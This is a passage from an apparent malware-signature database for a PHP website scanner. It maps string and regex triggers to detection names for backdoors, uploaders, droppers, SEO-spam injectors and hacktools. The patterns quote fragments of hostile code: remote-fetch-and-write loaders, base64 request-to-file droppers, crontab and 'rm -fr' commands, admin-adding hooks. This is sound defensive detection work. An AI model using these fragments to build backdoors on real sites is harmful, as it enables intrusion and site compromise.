			'_*") as $ff){unlink($ff);}' => array(STR_CLEARFILE, 'php.spam-seo.injector_gen.030', NULL),
			'fucksure' => array(STR_CLEARFILE, 'php.spam-seo.redirect.030.002', NULL),
			'$hhg = file_get_contents("http://' => array(STR_CLEAR_MULTIMATCH, 'php.malware.injector.032', '\$ip = ._SERVER..HTTP_X_FORWARDED_FOR..;\s*if\s*\(empty..ip..\s*\{[^\(]+?\$hhg = file_g[^\)]++\);\s*echo .hhg;'),
			'$refer=getenv(\'HTTP_USER_AGENT\');' => array(STR_CLEAR_MULTIMATCH, 'php.malware.injector.029',  '\$refer=getenv..HTTP_USER_AGENT[^;]+;\nif.preg_match[^;]+\w+\s*=\s*file_get_contents[^\n]+;\necho\s*\(\$\w+.;'),
			'$Content_mb=file_get_contents($Remote_server."/index.php?host="' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.021', NULL),
			'class MLClient' => array(STR_CLEARFILE, 'php.spam-seo.mainlinks_ru.002', NULL),
			').GetIP().\'-\'.base64_encode(\'http:' => array(STR_CLEARFILE, 'php.backdoor.uploader.412', NULL),
		),
	
		'file_put_contents' => array(STR_TRIGGER,
	
			'curl_init(' => array(STR_TRIGGER,
	
				'\{[\s]*@http_response_code\(404\);[\s]*exit;[\s]*\}' => array(REX_TRIGGER,
					'md5($_GET[' => array(STR_CLEARFILE, 'php.backdoor.curl.017', NULL),
					'md5=@$_COOKIE[' => array(STR_CLEARFILE, 'php.backdoor.curl.019', NULL),
				),
	
				'.md5(time()).md5(time()).' => array(STR_TRIGGER,
					'return \'<?php' => array(STR_CLEARFILE, 'php.backdoor.fake_plugin.009', NULL),
					'".json_encode($result)."' => array(STR_CLEARFILE, 'php.backdoor.uploader.387', NULL),
				),
	
				'.md5(time()).md5(time()).' => array(STR_TRIGGER,
					'return \'<?php' => array(STR_CLEARFILE, 'php.backdoor.fake_plugin.009', NULL),
					'.json_encode($result).' => array(STR_CLEARFILE, 'php.backdoor.generic.087', NULL),
				),
	
				'fwrite(' => array(STR_TRIGGER,
					'chmod\(\$_SERVER\[.DOCUMENT_ROOT[^\{]+function[\s]*[\w]+\(\$[\w]+\)[\s]*\{[^\}]+\}[\s]*\$[\w]+[\s]*=[\s]*\$_SERVER[^\(]+\(.http' => array(REX_CLEAR_MULTIMATCH, 'php.backdoor.uploader.335', 'chmod\(\$_SERVER\[.DOCUMENT_ROOT.\]\.[^\}]+return[\s]*curl_exec\(\$[\w]+\);[\s]*curl_close\(\$[\w]+\);[\s]*\}[\s]*\$[\w]+[\s]*=[\s]*\$_SERVER\[.DOCUMENT_ROOT.\][\s]*\.[\s]*[^\)]+\);[\s]*file_put_contents\(\$[\w]+,[\s]*\$[\w]+\);[\s]*[^\)]+\);[\s]*\$[\w]+[\s]*=[\s]*fopen\(\$[\w]+,[\s]*.w.[\s]*\);[\s]*fwrite\(\$[\w]+,[\s]*\$[\w]+\);[\s]*fclose\(\$[\w]+\);'),
					'if(copyfiles($' => array(STR_CLEARFILE, 'php.backdoor.webshell.235', NULL),
				),
	
				'touch($' => array(STR_TRIGGER,
					'feedmtimeFolder(dirname($' => array(STR_CLEARFILE, 'php.backdoor.curl.026', NULL),
					'touch(dirname(__FILE__).\'/\'.basename(__FILE__),$' => array(STR_CLEARFILE, 'php.backdoor.uploader.408', NULL),
				),
	
				'if(@$_GET[' => array(STR_TRIGGER,
					'@array_map(\'unlink\',@glob' => array(STR_CLEARFILE, 'php.backdoor.curl.022', NULL),
					'if(!strstr($html_content,\'nobotuseragent' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.sitemap_doorway.004', '(@[\w]+[^}]+\}[\s]*\$[\w]+[^\}]+\}else\{[\s]*if\(isset\(\$_SERVER\[.[\w]+.\]\)\)\{[\s]*\$[\w]+[\s]*=[\s]*\$_SERVER\[.PHP_SELF.\][^\}]+\}else\{[\s]*\$[\w]+[\s]*=[\s]*\$_SERVER\[[^\}]+\}[\s]*\}[\s]*return[\s]*\$[\w]+;[\s]*\})?[\s]*(\$[\w]+[\s]*=[\s]*.[^;]+;[\s]*)?\$[\w]+[\s]*=[\s]*md5\((md5\()?@\$_GET\[[^&]+&&[\s]*strtolower\(\$_SERVER\[.HTTPS.\]\)[\s]*!==[\s]*.off.\)[\s]*\{[\s]*return[\s]*true;[\s]*\}[\s]*elseif[\s]*\([\s]*isset\(\$_SERVER\[.HTTP_X_FORWARDED_PROTO.\]\)[\s]*&&[^+]+strtolower\(\$_SERVER\[.HTTP_USER_AGENT.\]\);[\s]*if[\s]*\(\$[\w]+[\s]*!=[^[]+\$[\w]+\[\][\s]*=[\s]*\$[\w]+;[\s]*\}[\s]*\}[\s]*[\w]+\(\$[\w]+\);[\s]*\}[\s]*\}[\s]*return[\s]*\$[\w]+;[\s]*\}'),
				),

				'function rwx($' => array(STR_TRIGGER,
					'function getRequestUri()' => array(STR_TRIGGER,
						'@chmod($dir' => array(STR_CLEARFILE, 'php.backdoor.uploader.287', NULL),
					),
				),
	
				'if (isset($_GET[' => array(STR_TRIGGER,
					'trim($_REQUEST[' => array(STR_TRIGGER,
						'curl_init(\'http' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.344', 'function[\s]*[\w]+\(\$[\w]+=[^\{]+\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*isset\(\$_REQUEST\[[^!]+curl_exec\(\$[\w]+\);[\s]*if[\s]*\(\$[\w]+!=[^\}]+file_put_contents\(\$[\w]+,[\s]*\$[\w]+\);[\s]*\}[\s]*if[\s]*\(isset\(\$_GET\[[^\{]+\]\)\)[\s]*\{[\s]*echo[^;]+;[\s]*\}[\s]*\}[\s]*[\w]+\(\);'),
					),
				),
	
				'$indexcode);@touch($' => array(STR_TRIGGER,
					'echo \'indexcode not ok' => array(STR_CLEARFILE, 'php.backdoor.uploader.268', NULL),
				),
	
				'stream_context_create($' => array(STR_TRIGGER,
					'touch("./$randname.php", time() - mt_rand(' => array(STR_CLEARFILE, 'php.backdoor.curl.023', NULL),
				),
	
				'echo file_put_contents("../../index.php",' => array(STR_CLEARFILE, 'php.malware.dropper.014', NULL),
				'/mailer.zip", fetch_url(' => array(STR_CLEARFILE, 'php.backdoor.uploader.155', NULL),
				'<value><array><data><value><string>\'.macroses($site, $login)' => array(STR_CLEARFILE, 'php.hacktool.wordpress_bruteforce.004', NULL),
				'spiderhandler.php?checkdomain&time=' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.doorway_downloader.022', 'if\(!@\$incode!=false\|\|!@\$incode!=null\)[^@]+@file_get_contents[^<]+\$incode=true;\}'),
				'explode(\'{||}\', get_web_page(' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.uploader.261', 'if[\s]*\(isset\(\$_GET\[[^\]]+\]\)\)[\s]*\{[\s]*function get_web_page\([\s]*\$url[\s]*\)[\s]*\{[\s]*\$options[^}]+return \$content;[\s]*\}[\s]*\$[\w]+[\s]*=[\s]*isset.._SERVER[^}]+explode\(.\{\|\|\}.,[\s]*get_web_page[^>]+echo implode\([^;]+\);[\s]*die;[\s]*\}'),
				'if(httpcopy($_GET[\'url\'], $_GET[\'filename\'])){' => array(STR_CLEARFILE, 'php.backdoor.uploader.334', NULL),
				'$target_url = "http://$target_host' => array(STR_CLEARFILE, 'php.backdoor.uploader.358', NULL),
			),
	
			'$_SERVER["DOCUMENT_ROOT"]' => array(STR_TRIGGER,
	
				'CURLOPT_URL, $_GET[' => array(STR_TRIGGER,
	
					'($_POST[\'target\'], $_SERVER' => array(STR_TRIGGER,
						'"upload"] == "go"' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.curl.013.02', '\/\*[\s]*[^\*]+[\s]*\*\/[\s]*function[\s]*downloadShaitan[^>]+\$mainTheme[\s]*\.[\s]*.%\|\|[^;]+;[\s]*exit[^;]*;[\s\}]+\/\*[^\*]+\*\/'),
					),
					
					'chmod($_SERVER["DOCUMENT_ROOT"].\'/\'.$_GET[\'path\'].\'.php\',0644);' => array(STR_TRIGGER,
						'file_put_contents($path, \'<?php /*\'.' => array(STR_CLEARFILE, 'php.backdoor.uploader.280', NULL),
					),
	
					'Stage($fileStage,' => array(STR_CLEARFILE, 'php.backdoor.curl.013', NULL),
					'if(myRootNode[prop].innerText=="Akismet Protection")' => array(STR_CLEARFILE, 'php.backdoor.fake_plugin.007', NULL),
					'}file_put_contents($dir, $data);if(file_exists($dir)){echo' => array(STR_CLEARFILE, 'php.backdoor.uploader.405', NULL),
				),
	
				'file_put_contents($_SERVER["DOCUMENT_ROOT"].' => array(STR_TRIGGER,
	
					'pastebin' => array(STR_CHAIN_TRIGGER,
						'base64_decode(file_get_contents(' => array(STR_CLEAR_MULTIMATCH, 'php.malware.injector.087', '\$[\w]+[\s]*=[\s]*base64_decode\(file_get_contents\([^;]+\)\);[\s]*\$[\w]+[\s]*=[\s]*file_put_contents\(\$_SERVER\[.DOCUMENT_ROOT.\][^;]+\$[\w]+\);[\s]*if\([\s]*\$[\w]+[\s]*\)[\s]*\{[\s]*\$[\w]+[^;]+;[\s]*\}[\s]*else[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*.{5,100};[\s]*\}'),
					),
	
					'file_put_contents\(\$_SERVER\[.DOCUMENT_ROOT.\]\...wp-[\w]+[^,]+,[\s]*base64_decode\(.[^\)]{1000,}\)+;' => array(REX_CLEAR_LINEMATCH, 'php.malware.injector.074', 'file_put_contents\(\$_SERVER\[.DOCUMENT_ROOT.\]\...wp-[\w]+[^,]+,[\s]*base64_decode\(.[^\)]{1000,}\)+;'),
					'file_put_contents($_SERVER["DOCUMENT_ROOT"].base64_decode($' => array(STR_CLEAR_MULTIMATCH, 'php.malware.injector.074.02', '\$[\w]+[\s]*=[\s]*.dmFyIF[^\(]+(file_put_contents\(\$_SERVER\[.DOCUMENT_ROOT.\]\.base64_decode[^;]+\);[\s]*)+'),
				),
	
				'base64_decode(str_replace(" ","",' => array(STR_TRIGGER,
					'$_SERVER["DOCUMENT_ROOT"]."/wp-config.php";' => array(STR_TRIGGER,
						'$_POST["backname"].".php&&&".$directory."/".$_POST["backname' => array(STR_CLEAR_MULTIMATCH, 'php.malware.db_injector.001.02', 'add_action\("wp_[^;]+include_backdoor".;[\s]*function include_backdoor\(\)[\s]*\{[\s]*.f[\s]*\(\$_POST..include". ==[\s]*"create[^&]+backname"\][^;]+;[\s]*exit;[\s]*}[\s]*}'),
						'chmod("/' => array(STR_CLEARFILE, 'php.malware.db_injector.001', NULL), 
					),
				),
	
				'new WP_User($' => array(STR_TRIGGER,
					'$link_shellcode' => array(STR_CHAIN_TRIGGER,
						'$link_shellcode = $_POST["secretLink"];' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.wp_adminadd.012', 'add_action\(.wp_head.,[\s]*.[\w]+_add.\);[\s]*function [\w]+_add\(\)[\s]*\{[\s]*[iI]f[\s]*\(\$_GET\[[^\]]+\][\s]*==[\s]*.go[^\|]+echo .\|\|\|[^\?]+function[\s]*uploadCurl_[\w]+\(\)[\s]*\{[^\}]+[\s\}]+'), 
						'$_POST[\'target\'], $_SERVER["DOCUMENT_ROOT"]' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.wp_adminadd.012.02', 'function get_text_[\w]+_serv_[\w]+\(\$url_s,[\s]*\$file_s\)[\s]*\{[\s]*[^\}]+\$data\);[\s]*\}[\s]*if[\s]*\(\$_POST\[.activate[^\}]+\|\|\|.;[\s]*\}[\s]*'), 
					),
				),
	
				'preg_match(' => array(STR_TRIGGER,
					'$target_path=basename($_FILES["uploadedfile"]["name"]);if(move_uploaded_file($_FILES' => array(STR_TRIGGER,
						'>file uploaded</font>' => array(STR_CLEARFILE, 'php.backdoor.uploader_POST.019', NULL),
					),
				),
	
				'&& file_put_contents($file, $data)) {' => array(STR_CLEARFILE, 'php.malware.dropper.015', NULL),
				'chmod($_SERVER["DOCUMENT_ROOT"]."/wp-temp.php", 0644);' => array(STR_CLEARFILE, 'php.backdoor.wp-temp.001', NULL),
				'var myRootNode = document.getElementById("plugin");' => array(STR_CLEARFILE, 'php.backdoor.fake_plugin.006', NULL),
			), 
	
			'.chr(' => array(STR_TRIGGER,
	
				',chr(60).chr(63).chr(112).chr(104).chr(112).chr(32)' => array(STR_TRIGGER,
	
					'@file_put_contents(' => array(STR_TRIGGER,
						'@include(' => array(STR_TRIGGER,
							'@unlink(' => array(STR_CLEAR_MULTIMATCH, 'php.malware.infector.005', '\$[\w]+[\s]*=[^;]+chr\([^;]+;[^@]+@file_put_contents[^;]+;[\s]*@include[^;]+\);[\s]*@unlink[^;]+\);'),
						),
					),
	
					'=@sha1_file($' => array(STR_TRIGGER,
						';mail($to,$subject,$message,$headers);}' => array(STR_CLEARFILE, 'php.hacktool.ransomware.003', NULL),
					),
				),
	
				']);file_put_contents(' => array(STR_TRIGGER,
					',\'<?php \'.$m);include(' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.uploader.095', '\$m=.b[^(]+\.chr\([^;]+;[\s]*\$m=\$m\(\$_(REQUEST|POST)[^;]+;file_put_contents\(.[\w].,.<.php[^;]+;[\s]*include[^;]+;[\s]*(unlink..[\w]..;)?'),
				),
	
				'return "ok";}else{return "true";}}else return "false";}if(file_exists($_SERVER[' => array(STR_CLEARFILE, 'php.spam-seo.infector.008', NULL),
				'if(file_exists($index)){@chmod($index,0755);}@file_put_contents($index' => array(STR_CLEARFILE, 'php.backdoor.uploader_POST.020', NULL),
			),
	
			',\'<?php \'.$' => array(STR_TRIGGER,
				');unlink($' => array(STR_CHAIN_TRIGGER,
					'&& md5($_POST[' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.uploader.419', 'if[\s]*\([\s]*isset[\s]*\([\s]*\$_POST[^\{]+\{[\s]*\$[\w]+[\s]*=[\s]*base64_decode\([\s]*\$_POST[^;]+;[\s]*file_put_contents[^\}]+unlink[^;]+\);[\s\}]+'),
					'\$[\w][\s]*=[\s]*...;[\s]*\$[\w][\s]*=[\s]*\$_REQUEST\[...\];[\s]*\$[\w]+[\s]*=[\s]*base64_decode\(\$.\);[\s]*file_put_contents[^\)]+\);[\s]*include\(\$.\);[\s]*unlink\(\$[\w]+\);[\s]*' => array(REX_CLEAR_LINEMATCH, 'php.backdoor.uploader.419.02', '\$[\w][\s]*=[\s]*...;[\s]*\$[\w][\s]*=[\s]*\$_REQUEST\[...\];[\s]*\$[\w]+[\s]*=[\s]*base64_decode\(\$.\);[\s]*file_put_contents[^\)]+\);[\s]*include\(\$.\);[\s]*unlink\(\$[\w]+\);[\s]*'),
					'error_reporting(0);' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.uploader.419.03', 'error_reporting\(0\);[\s]*'),
					'ini_set\(\'display_errors\',[\s]*0\);' => array(REX_CLEAR_LINEMATCH, 'php.backdoor.uploader.419.04', 'ini_set\(.display_errors.,[\s]*0\);[\s]*'),
				),
			),

			'$php_main_file = trailingslashit(ABSPATH) . "wp-content/plugins/" . $active_plugins[rand' => array(STR_CHAIN_TRIGGER,
				'wp_register_script($name."-json-min"' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.injector.118', 'static function all_plugins\(\$plugins\)[\s]*\{[\s]*foreach[\s]*\(\$plugins as \$name => \$plugin\)[\s]*\{[\s]*if[\s]*\(\$name == .[\w]+.[^\)]+\)[\s]*unset\(\$plugins\[\$name\]\);[\s]*\}[\s]*return \$plugins;[\s]*\}[\s]*static function [\w]+\(\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*base64_decode[^}]+\}[^>]+static function [\w]+\(\)[\s]*\{[\s]*\$[\w]+[^}]+\$_POST\)\);[\s]*\}'),
				'validate_install\'));' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.injector.118.02', 'add_action\("init",[\s]*array\([^;]+validate_install.\)\);'),
				'all_plugins\'));' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.injector.118.03', 'add_filter\(.all_plugins.,[\s]*array\([^;]+all_plugins.\)\);'),
				'widget_ajax\'));' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.injector.118.04', 'add_action\(.wp_ajax[\w]+.,[\s]*array\([^;]+widget_ajax.\)\);'),
			),
	
			'base64_decode($_REQUEST' => array(STR_TRIGGER,
	
				'file_put_contents(' => array(STR_TRIGGER,
					'print \'<iframe style="position:absolute;top:-999em;left:-999em;" scrolling="no" src="\'.$' => array(STR_CLEARFILE, 'php.spam-seo.iframer.006', NULL),
					'\'.base64_decode($_REQUEST[' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.file_put_contents.001', '@?file_put_contents\([^;]+base64_decode\(\$_REQUEST[^;]+;[\s]*@?include[^;]+\);[\s]*(@?unlink\([^;]+\);)?'),
				),
	
				'echo $filename." write success";' => array(STR_CLEARFILE, 'php.backdoor.curl.009', NULL),
			),
	
			'uname' => array(STR_TRIGGER,
				'function massive_folder($put, $glubina, $max_massive)' => array(STR_CLEARFILE, 'php.malware.generic.066', NULL),
				'class WP_Backup' => array(STR_CLEARFILE, 'php.backdoor.fakewpbackup.001', NULL),
				'QWpheC5SZXNwb25kZXJzLnJlZ2lzdGVyKFZhcmllbi5HbG9iYWxIYW5kbGVycyk7' => array(STR_CLEARFILE, 'js.malware.magento-cc-stealer.033.02', NULL),
			),
	
			'function class_x_i(' => array(STR_CHAIN_TRIGGER,
				'function class_x_i' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.279', 'function class_x_i\([\s]*\$[\w]+[\s]*=[\s]*..\)[^\x02]+class_x_i\(\);'),
				'function BASE64_DEC0DE($' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.279.02', 'function BASE64_DEC0DE\(\$[^{]+\{[\s]*\$[\w]+[\s]*=[\s]*substr[^\}]+return gzinflate[^;]+\);[\s]*\}'),
				'function https_check($custom_scheme' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.279.03', 'function https_check\(\$custom_scheme[^\)]+\)[\s]*\{[^\}]+[\s\}]+else[\s]*\{[\s]*if[\s]*\(\$custom_scheme[^\}]+[\s\}]+return \$[\w]+;[\s]*\}[\s]*(\/\/[^\n]+)?'),
			),
	
			'.zip",$data);' => array(STR_TRIGGER,
	
				'class PclZip' => array(STR_TRIGGER,
					'if ($archive->extract() == 0) {' => array(STR_TRIGGER,
						'$data = base64_decode("' => array(STR_CLEARFILE, 'php.malware.dropper.004.02', NULL),
					),
				),
	
				'mkdir("$path/$drname", 0777);' => array(STR_TRIGGER,
					'substr(str_shuffle($' => array(STR_CLEARFILE, 'php.malware.dropper.040', NULL),
				),
			),
	
			'if (file_exists($file_name)' => array(STR_TRIGGER,
	
				'->extractTo(' => array(STR_TRIGGER,
					'print(file_put_contents($_REQUEST' => array(STR_TRIGGER,
						'foreach(scandir($' => array(STR_CLEARFILE, 'php.backdoor.backdoor_installer.011', NULL),
					),
				),
				
				'AF client v2.0 already installed!<hr><hr>' => array(STR_TRIGGER,
					'file_put_contents($put, $data)' => array(STR_CLEARFILE, 'php.backdoor.domen.001', NULL),
				),
			),
	
			'@unlink($working_dir . "/wordpress/wp-admin/includes/class-wp-upgrader' => array(STR_TRIGGER,
				'if ($destination_name == "wordfence" && ($data = file_get_contents($file = $destination' => array(STR_CHAIN_TRIGGER,
					'@unlink($working_dir . "/wordpress' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.wordpresscore.007.02', 'if[\s]*\(strpos\(\$package, "wordpress-"\) !== false\)[\s]*\{[\s]*@unlink\(\$working_dir[\s]*\.[\s]*".wordpress.wp-admin.includes.class-wp-upgrader.php"\);[\s]*@unlink[^;]+;[\s]*}'),
					'if (method_exists("wordfenceHash", "wfHash"' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.wordpresscore.007', 'if \(\$destination_name == "wordfence" && \(\$data = file_get_contents\(\$file = \$destination \. "lib.wfScanEngine\.php"\)\)\)[\s]*\{[\s]*\$data[\s]*=[\s]*str_replace\(\'[^\']+\',[\s]*\'[^\']+\',[\s]*\$data,[\s]*\$count\);[\s]*if[\s]*\(\$data[^{]+\{[\s]*file_put_contents\(\$[^;]+;[\s]*}[\s]*}'),
				),
			),
	
			'file_put_contents("../../../../..' => array(STR_TRIGGER,
				'WRpZSgpO30gPz4="); @file_put_contents($_SERVER[\'DOCUMENT_ROOT\']."' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.injector.135', '\$[\w]+[\s]*=[\s]*base64_decode\(.PD9[^;]+;[\s]*(@file_put_contents\([^;]+\);[\s]*)+'),
				';unlink(__FILE__);rmdir(__DIR__);`rm -fr ..' => array(STR_CLEARFILE, 'php.backdoor.injector.135.02', NULL),
			),
	
			'$argv[' => array(STR_TRIGGER,
				'echo exec(\'crontab' => array(STR_CLEARFILE, 'php.backdoor.file_put_contents.003', NULL),
				'return array(\'status\'=>\'GOOD\',\'success\'=>$brutePass[\'password\']);' => array(STR_CLEARFILE, 'php.hacktool.bruteforce.007', NULL),
			),
	
			'if(!isset($_POST[\'cmd\']))' => array(STR_TRIGGER,
				'include($f);' => array(STR_TRIGGER,
					'unlink($f);' => array(STR_TRIGGER,
						'file_put_contents($f,\'<?php \'.$' => array(STR_CLEARFILE, 'php.backdoor.uploader.285', NULL),
					),
				),
			),
	
			'if (is_writable($pth."wp-content/plugins")) { $wpdir =' => array(STR_TRIGGER,
				'copy("favicon.ico",$wpdir."/favicon.ico");' => array(STR_TRIGGER,
					'mkdir($wpdir,0777,true);' => array(STR_CLEARFILE, 'php.malware.favicon.001', NULL),
				),
			),
	
			'@scandir' => array(STR_TRIGGER,
				'<input type=\'text' => array(STR_TRIGGER,
					'($_POST[\'base_dir\'])' => array(STR_CLEARFILE, 'php.backdoor.uploader_POST.033', NULL),
				),
			),
	
			'base64_decode(str_replace(" ","",' => array(STR_TRIGGER,
				'add_action("wp_head", "wpdsw_add");' => array(STR_TRIGGER,
					'file_put_contents($directory."/".$name.".php", base64_decode' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader_POST.008', 'add_action\("wp_head", "wpdsw_add"\);[\s]*function wpdsw_add\(\)[\s]*\{[\s]*.f[\s]*\(\$_GET..wpdsw"\][\s]*==[\s]*"go"\)[\s]*\{[\s]*require_once[\s]*\("wp-includes.registration.php[^}]+set_role..administrator[^%]+file_put_contents..directory[^%]+echo [^\.]+\.[\s]*str_replace.._SERVER[^;]+;[\s]*exit;[\s]*}[\s]*}[^>]+mainTheme[\s]*\.[\s]*"%[^"]+";[\s]*exit;[\s]*}[\s]*}'),
				),
			),
	
			'curl_setopt ( $wp_' => array(STR_TRIGGER,
				'file_put_contents ( ABSPATH . WPINC' => array(STR_CLEAR_MULTIMATCH, 'php.malware.dropper.011', 'error_reporting\(0\);[\s]*\$wp_[\w]+[\s]*=[\s]*strrev[\s]*\([\s]*[^)]+ptth.[\s]*\);[^\?]+?if[\s]*\([\s]*(is_file|stripos)[^\?]+?ABSPATH[\s]*\.[\s]*WPINC[^\?]+file_put_contents[\s]*\([^,]+,[\s]*\$wp_[^)]+\);[\s}]+'),
			),
	
			'substr($path, 0, stripos($path, \'/public_html/\') + strlen(\'/public_html/\')' => array(STR_TRIGGER,
				'file_put_contents($path, $text' => array(STR_CLEARFILE, 'js.spam-seo.injector.047.02', NULL),
			),
	
			'$taskdir = @mkdir(\'task_\'.$_POST[\'task\']);' => array(STR_TRIGGER,
				'$content = preg_replace(\'/href="([^\s"]+)"/\', \'href="' => array(STR_CLEARFILE, 'php.backdoor.webshell.097', NULL),
			),
	
			'file_put_contents($_GET[\'fpath\'], base64_decode($_REQUEST[\'data\'])' => array(STR_TRIGGER,
				'die(\'!~\'.\'!\'.$_GET[\'fpath\'].\'!\'.\'~!\');' => array(STR_CLEARFILE, 'php.backdoor.uploader.081', NULL),
			),
	
			'while (1==1)' => array(STR_TRIGGER,
				'@unlink($_SERVER[\'SCRIPT_FILENAME\']);' => array(STR_CLEARFILE, 'php.malware.harakiri.001', NULL),
			),
	
			'preg_match(\'/<password><!\[CDATA\[(.*?)\]\]><\/password>/i\',' => array(STR_TRIGGER,
				'@$_REQUEST[\'icn\'].\'|\'.@$_REQUEST[\'icm\'].\'|\'.@$_REQUEST[\'icy\'].' => array(STR_CLEARFILE, 'php.hacktool.cms_credentials_stealer.006', NULL),
			),
	
			'$info[\'db_password' => array(STR_TRIGGER,
				'new VP_Restore_Helper();' => array(STR_CLEARFILE, 'php.hacktool.VP_restore.001', NULL),
			),
	
			'function get_file_name($path)' => array(STR_TRIGGER,
				'wp_enc_file' => array(STR_CLEARFILE, 'php.backdoor.wordpresscore.006', NULL),
			),
	
			', 0777, true);' => array(STR_TRIGGER,
				'echo $confx_success."|' => array(STR_CLEARFILE, 'php.backdoor.webshell.075', NULL),
			),
	
			'htaccess_' => array(STR_TRIGGER,
				'function do_backdoor($root_path' => array(STR_CLEARFILE, 'php.backdoor.do_backdoor.002', NULL),
			),
	
			'if($nend > $end){ $nend = $end; }' => array(STR_TRIGGER,
				'$sitemap .= \'<url><loc>\'.$link.\'</loc><mobile:mobile/></url>\';' => array(STR_CLEARFILE, 'php.backdoor.uploader.102', NULL),
			),
	
			'."/wp-admin/includes/"."' => array(STR_TRIGGER,
				'=dirname(dirname(dirname(dirname(__FILE__))));' => array(STR_CLEARFILE, 'php.backdoor.uploader.131', NULL),
			),
	
			'chmod($file_index, 0777);' => array(STR_TRIGGER,
				'$start."Sinst Included' => array(STR_CLEARFILE, 'php.malware.injector.049', NULL),
			),
	
			'function get_data' => array(STR_TRIGGER,
				'get_data(\'http' => array(STR_CLEAR_MULTIMATCH, 'php.malware.injector.051', 'function get_data\(\$url\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*curl_init\(\);[^}]+}[\s]*\$[\w]+[\s]*=[\s]*[\'"][^;]+[\'"];[^>]+\$[\w]+[\s]*=[\s]*get_data\([^;]+\);[\s]*file_put_contents\([^;]+\);'),
			),
	
			'function php_in' => array(STR_TRIGGER,
				'if (strpos($file, $what_find) !== false) {' => array(STR_CLEARFILE, 'php.backdoor.injector.116', NULL),
			),
	
			'."/wp-config.php")){if(unlink($' => array(STR_TRIGGER,
				'str_replace(\'</head>\',\'<script type="text/javascript">\'.$' => array(STR_CLEARFILE, 'php.spam-seo.injector.269', NULL),
			),
	
			'echo "e1:".$f' => array(STR_TRIGGER,
				'@search_file($_SERVER[\'DOCUMENT_ROOT\']."/../../../../..",$file_to_search);' => array(STR_CLEARFILE, 'php.malware.infector.002', NULL),
			),
	
			'){echo\'WP_Error_Page_Not_Found \'." </br>' => array(STR_TRIGGER,
				'file_get_contents(\'https://gist.githubusercontent' => array(STR_CLEARFILE, 'php.malware.injector.054', NULL),
			),
	
			'if(isset($_GET[\'s\'])){echo' => array(STR_TRIGGER,
				'if(isset($_POST[\'c\'])){file_put_contents($_POST[\'n\'],base64_decode($_POST[\'c\']));}die();}' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.uploader.286', 'if\(isset\(\$_GET\[.[\w]+.\]\)\)\{echo[^;]+;[\s]*if\(isset\(\$_POST\[.c.\]\)\)\{file_put_contents\(\$_POST\[[^\}]+\}die\(\);\}'),
			),
	
			'function scan_dir($dir)' => array(STR_TRIGGER,
				'file_put_contents($output[0]' => array(STR_CLEARFILE, 'php.backdoor.uploader.291', '\$[\w]+[\s]*=[\s]*.[\w]+.[\w]*\W;[\s]*\$[\w]+[\s]*=[\s]*.PD9waHAgY2[^)]+error_reporting\(0\);[\s]*\$[\w]+[\s]*=[\s]*\$_SERVER\[.DOCUMENT_ROOT.\];[\s]*function[^\{]+\{[\s]*\$[\w]+[\s]*=[\s]*scandir\(\$[^\}]+}[\s]*}[\s]*return[\s]*\$[^\}]+\}[\s]*function[\s]*scan_dir\(\$[^@]+\@unlink\(preg_replace\(.[^_]+__FILE__\)\);'),
			),
	
			'false){continue;}die(\'OK=' => array(STR_TRIGGER,
				'@urlencode(@base64_encode(@var_export($' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_POST.123', 'if\(defined\(.[\w]+.\)[\s]*&&[\s]*!defined\([^\)]+\)[\s]*&&[\s]*isset\(\$_SERVER[^\{]+localhost.\)[\s]*===[\s]*false\)[\s]*\{[\s]*if\(isset\(\$_POST[^;]+;[\s]*@error_reporting\(0\);[\s]*@eval[^:]+file_get_contents\(.https?:[^;]+\);[\s]*if\(@file_put[^;]+;[\s\}]+'),
			),
	
			'$tmpfile = tempnam(sys_get_temp_dir(),\'\');' => array(STR_TRIGGER,
				'function strings($text, $key){for($i=0;$i<strlen($text);' => array(STR_CLEARFILE, 'php.malware.dropper.033', NULL),
			),
	
			'echo @file_put_contents($_POST[' => array(STR_TRIGGER,
				']); die(md5(1));' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.uploader.318', 'echo[\s]*@file_put_contents\(\$_POST\[.[\w]*.\],[\s]*\$_POST\[.[\w]*.\]\);[\s]*die\(md5\([\d]*\)\);'),
			),
	
			'x_iso' => array(STR_TRIGGER,
				'file_put_contents($sname,$result);' => array(STR_CLEARFILE, 'php.backdoor.file_get_contents.033', NULL),
			),
	
			'> 64) || die(' => array(STR_TRIGGER,
				'@system("killall -9 ".$' => array(STR_CLEARFILE, 'php.malware.dropper.035', NULL),
			),
	
			'function rdFile' => array(STR_TRIGGER,
				'&& isset($recover_file) && isset($recover_file_url)){' => array(STR_CLEARFILE, 'php.backdoor.uploader.258', NULL),
			),
	
			'php\',base64_decode(\'PD' => array(STR_TRIGGER,
				'<?php file_put_contents($_SERVER[\'DOCUMENT_ROOT\'].' => array(STR_CLEARFILE, 'php.malware.dropper.039', NULL),
				'ignore_user_abort(1);while(1){file_put_contents($_SERVER[\'DOCUMENT_ROOT\'].' => array(STR_CLEARFILE, 'php.malware.dropper.042', NULL),
